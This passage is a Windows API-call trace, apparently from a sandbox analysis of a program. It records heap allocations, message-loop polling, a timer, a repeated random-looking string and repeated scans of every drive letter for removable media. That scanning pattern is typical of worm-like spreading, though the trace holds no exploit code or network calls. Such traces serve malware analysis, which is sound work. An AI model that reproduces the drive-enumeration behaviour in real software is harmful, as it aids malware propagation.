wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326020 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326020 | out: hHeap=0x12c0000) returned 1 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.530] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0219.530] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0219.530] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d50 | out: hHeap=0x12c0000) returned 1 [0219.530] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.531] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0219.531] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0219.531] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0219.531] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.531] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.531] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.532] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.532] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.572] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.572] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.572] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.573] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.573] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.573] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.574] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.574] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.574] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.574] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.574] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.574] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.575] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.575] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.575] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.575] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.575] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.575] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.576] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.576] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.576] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.576] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.576] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.576] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.577] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0219.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0219.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0219.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.577] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.577] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.578] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.578] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.578] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.578] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0219.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0219.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0219.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0219.579] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.579] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0219.579] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0219.579] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0219.579] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.579] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd208 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.580] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.580] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0219.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0219.580] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.580] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.580] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.581] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.581] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.581] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.582] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.582] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.582] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.582] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.582] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.583] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.583] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.583] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.583] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.583] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.585] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.585] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.585] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.586] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.586] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.586] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.586] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.586] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.587] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.587] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.588] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0219.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0219.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0219.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0219.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0219.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0219.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0219.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.588] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0219.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0219.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0219.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325de0 [0219.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.589] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325de0 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0219.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e080 [0219.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e080 | out: hHeap=0x12c0000) returned 1 [0219.589] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0219.589] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0219.589] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0219.589] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0219.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0219.589] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.590] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0219.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0219.590] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0219.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0219.590] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0219.590] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0219.590] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0219.590] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0219.590] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0219.590] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0219.591] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0219.591] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0219.591] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0219.591] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0219.591] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0219.591] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0219.592] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0219.592] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0219.592] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0219.592] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0219.592] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0219.593] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0219.593] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0219.593] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0219.593] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0219.594] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0219.594] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0219.594] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0219.594] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0219.594] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0219.595] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0219.595] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0219.595] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0219.595] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0219.595] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0219.595] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0219.596] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0219.596] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0219.596] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0219.596] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0219.596] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0219.597] HeapFree (in: hHeap=0x12c0000, 